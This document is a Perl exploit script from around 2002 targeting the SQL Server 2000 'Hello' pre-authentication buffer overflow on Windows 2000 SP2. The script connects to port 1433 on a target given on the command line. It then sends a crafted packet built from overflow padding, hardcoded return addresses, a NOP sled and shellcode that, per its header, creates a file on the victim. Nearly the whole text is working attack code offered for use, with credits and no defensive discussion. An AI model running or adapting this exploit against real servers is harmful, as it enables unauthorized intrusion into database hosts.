sql2kx2.txt

`#!/usr/local/bin/perl  
  
#-----------------------------------------------------------  
# Exploit will create file '\scan_sql2k_bo2.'  
#  
# SQL Server 2000 'Hello Bug' for Win2k(SP2)  
# by [email protected] & spoonfork  
#  
# Bug found by  
# Dave Aitel   
# http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0  
#  
# http://www.scan-associates.net/  
# greetz to: scan clan, especially to tynon, pokleyzz, and wyse  
# Alphaque and L33tdawg.  
# and Dave Aitel for finding and not releasing the exploit :>  
# original and most up-to-date of dis file can be found in  
# http://www.scan-associates.net/papers/sql2kx2.txt  
#-----------------------------------------------------------  
use Socket;  
  
  
$connect_host = $ARGV[0];  
  
if (!defined($connect_host)) {  
print "Usage: $0 <target>\n";  
exit 255;  
}  
  
$port = 1433;  
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";  
$sock_addr = pack_sockaddr_in($port,$iaddr);  
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";  
connect(SOCKET,$sock_addr) || die "Connect Error\n";  
select(SOCKET); $|=1; select(STDOUT);  
  
$bug = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";  
$bug .= "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";  
$bug .= "\x10\x00\x00\x00";  
$bug2 = "A" x 528;  
$bug .= $bug2;  
$bug .= "\x6b\xd0\xc0\x40";  
$bug .= "AAAA";  
$bug .= "\x83\x91\xe8\x77";  
$bug .= "\x50\x1e\xd0\x42";  
$bug .= "\x0b\x03\x0f\x02";  
$bug .= "DDDD";  
$bug .= "\x50\x1e\xd0\x42";   
$bug .= "\x50\x1e\xd0\x42";   
$bug3 = "\x90" x 88;  
$bug .= $bug3;  
$bug .= "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";  
$bug .= "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";  
$bug .= "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";  
$bug .= "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";  
  
$bug .= "\x00\x24\x01\x00\x00";  
  
print SOCKET $bug;  
  
  
`